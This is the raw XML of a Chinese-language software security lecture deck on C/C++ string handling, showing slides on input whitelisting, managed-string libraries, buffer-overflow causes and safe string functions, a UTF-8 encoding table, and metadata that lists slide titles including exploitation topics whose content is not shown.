              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96259" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>定义可接受的字符列表，删除任何不可接受的字符</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>有效的输入值列表通常是可预测的、定义良好的可控大小。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>白色的清单可以用来确保一个字符串中只包含程序员认为安全的字符。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8834080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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>数据处理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97283" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串管理库通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>可选</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>确保字符串中的所有字符属于一组预定义的“安全”字符，来提供一种处理数据的机制。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>	errno_t setcharset(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>		string_m s, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>		const string_m safeset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>	);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRP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87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14980158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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串小结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98307" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="2060848"/>
            <a:ext cx="8140700" cy="5130800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缓冲区溢出在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>语言中很常见，因为这些语言</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>定义字符串为一个空结尾的字符数组</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>不执行隐式边界检查</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>提供不执行边界检查的字符串标准库调用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>basic_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>类更不容易出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>程序错误。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ISO/IEC “Security” TR 24731</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>定义的字符串函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>对遗留系统的修复很有用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>新的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>语言开发要考虑使用字符串管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{995E8DC3-6773-B14F-B697-ECFEC989770F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21064742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241425" y="2911475"/>
            <a:ext cx="3810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400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>谢谢大家</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79875" name="Picture 3" descr="BS0055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71975" y="2360613"/>
            <a:ext cx="3975100" cy="346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日期占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB518EC4-BDBB-4D45-8EFC-C5B89F2A59C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="6356351"/>
            <a:ext cx="2057400" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DF49A477-5D1B-4945-90D0-1D4D837DC003}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2021/12/18</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23C0ED83-D17E-9C4D-8D94-7376497C69DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457950" y="6356351"/>
            <a:ext cx="2057400" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B37E27DE-2C90-1A47-8578-7A6800C955B4}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125780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585A8-BC1E-4146-B93F-8F5194AF8AD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UTF-8</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E730B18-5AED-458A-8D1F-A900B07DD494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{995E8DC3-6773-B14F-B697-ECFEC989770F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F589BCED-C3A8-40B7-95D4-867AC07E9017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675481" y="2440484"/>
            <a:ext cx="7793037" cy="1969770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 0xxxxxxx </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 110xxxxx 10xxxxxx </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 1110xxxx 10xxxxxx 10xxxxxx </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 1111110x 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303830224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TotalTime>
  <Words>7793</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>1199</Paragraphs>
  <Slides>89</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89</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="101" baseType="lpstr">
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>SimHei</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Monotype Corsiva</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 主题​​</vt:lpstr>
      <vt:lpstr>软件安全</vt:lpstr>
      <vt:lpstr>注意</vt:lpstr>
      <vt:lpstr>问题</vt:lpstr>
      <vt:lpstr>字符串</vt:lpstr>
      <vt:lpstr>C-风格的字符串</vt:lpstr>
      <vt:lpstr>字符串数据基本概念</vt:lpstr>
      <vt:lpstr>字符串数据基本概念</vt:lpstr>
      <vt:lpstr>UTF-8</vt:lpstr>
      <vt:lpstr>UTF-8</vt:lpstr>
      <vt:lpstr>字面值</vt:lpstr>
      <vt:lpstr>C++ 字符串</vt:lpstr>
      <vt:lpstr>常见的字符串操作错误</vt:lpstr>
      <vt:lpstr>1、无界字符串复制</vt:lpstr>
      <vt:lpstr>复制和连接字符串「源无界导致」</vt:lpstr>
      <vt:lpstr>简单的解决方案</vt:lpstr>
      <vt:lpstr>C++无界字符串复制</vt:lpstr>
      <vt:lpstr>简单的解决方案</vt:lpstr>
      <vt:lpstr>2、差一错误</vt:lpstr>
      <vt:lpstr>3、空结尾错误</vt:lpstr>
      <vt:lpstr>来自ISO/IEC 9899:1999</vt:lpstr>
      <vt:lpstr>4、字符串截断</vt:lpstr>
      <vt:lpstr>5、数组写入越界</vt:lpstr>
      <vt:lpstr>6、不恰当的数据处理</vt:lpstr>
      <vt:lpstr>问题</vt:lpstr>
      <vt:lpstr>缓冲区溢出/栈溢出</vt:lpstr>
      <vt:lpstr>缓冲区溢出</vt:lpstr>
      <vt:lpstr>IsPasswordOK程序实例</vt:lpstr>
      <vt:lpstr> 缓冲区溢出</vt:lpstr>
      <vt:lpstr>缓冲区溢出</vt:lpstr>
      <vt:lpstr>漏洞</vt:lpstr>
      <vt:lpstr>发生了什么？ </vt:lpstr>
      <vt:lpstr>栈粉碎</vt:lpstr>
      <vt:lpstr>代码注入</vt:lpstr>
      <vt:lpstr>代码注入/恶意参数</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>./vulprog &lt; exploit.bin</vt:lpstr>
      <vt:lpstr>Mal Arg Decomposed</vt:lpstr>
      <vt:lpstr>Mal Arg Decomposed</vt:lpstr>
      <vt:lpstr>Mal Arg Decomposed</vt:lpstr>
      <vt:lpstr>代码注入/恶意代码</vt:lpstr>
      <vt:lpstr>Shell 代码案例</vt:lpstr>
      <vt:lpstr>创建一个零日攻击</vt:lpstr>
      <vt:lpstr>Shell 代码</vt:lpstr>
      <vt:lpstr>Shell 代码</vt:lpstr>
      <vt:lpstr>Shell 代码</vt:lpstr>
      <vt:lpstr>弧注入 (return-into-libc)</vt:lpstr>
      <vt:lpstr>弧注入/漏洞程序</vt:lpstr>
      <vt:lpstr>漏洞利用</vt:lpstr>
      <vt:lpstr>缓冲区溢出之前及之后的栈</vt:lpstr>
      <vt:lpstr>get_buff() 返回</vt:lpstr>
      <vt:lpstr>get_buff() 返回</vt:lpstr>
      <vt:lpstr>get_buff() 返回</vt:lpstr>
      <vt:lpstr>get_buff() 返回</vt:lpstr>
      <vt:lpstr>f() 返回</vt:lpstr>
      <vt:lpstr>f() 返回</vt:lpstr>
      <vt:lpstr>f() 返回</vt:lpstr>
      <vt:lpstr>f() 返回</vt:lpstr>
      <vt:lpstr>g() 返回</vt:lpstr>
      <vt:lpstr>g() 返回</vt:lpstr>
      <vt:lpstr>g() 返回</vt:lpstr>
      <vt:lpstr>g() 返回</vt:lpstr>
      <vt:lpstr>为什么这个是有意思的?</vt:lpstr>
      <vt:lpstr>缓解措施</vt:lpstr>
      <vt:lpstr>静态方法  静态分配缓冲区</vt:lpstr>
      <vt:lpstr>输入验证</vt:lpstr>
      <vt:lpstr>静态防范措施</vt:lpstr>
      <vt:lpstr>strlcpy() 和 strlcat()</vt:lpstr>
      <vt:lpstr>大小问题   </vt:lpstr>
      <vt:lpstr>字符串截断 </vt:lpstr>
      <vt:lpstr>strlcpy() 和 strlcat() 总结</vt:lpstr>
      <vt:lpstr>静态防范方法</vt:lpstr>
      <vt:lpstr>ISO/IEC “Security” TR 24731</vt:lpstr>
      <vt:lpstr>ISO/IEC “Security” TR 24731 Goals</vt:lpstr>
      <vt:lpstr>strcpy_s() 函数</vt:lpstr>
      <vt:lpstr>strcpy_s() 例子</vt:lpstr>
      <vt:lpstr>ISO/IEC TR 24731 小结</vt:lpstr>
      <vt:lpstr>动态方法 动态地分配缓冲区</vt:lpstr>
      <vt:lpstr>防范策略 SafeStr</vt:lpstr>
      <vt:lpstr>safestr_t 类型</vt:lpstr>
      <vt:lpstr>错误处理</vt:lpstr>
      <vt:lpstr>SafeStr 例子</vt:lpstr>
      <vt:lpstr>管理字符串</vt:lpstr>
      <vt:lpstr>数据类型</vt:lpstr>
      <vt:lpstr>创建/回收字符串的例子</vt:lpstr>
      <vt:lpstr>黑名单</vt:lpstr>
      <vt:lpstr>白名单</vt:lpstr>
      <vt:lpstr>数据处理</vt:lpstr>
      <vt:lpstr>字符串小结</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 国胜</dc:creator>
  <cp:lastModifiedBy>徐 国胜</cp:lastModifiedBy>
  <cp:revision>26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-27T04:09:13Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-18T12:57:34Z</dcterms:modified>
</cp:coreProperties>
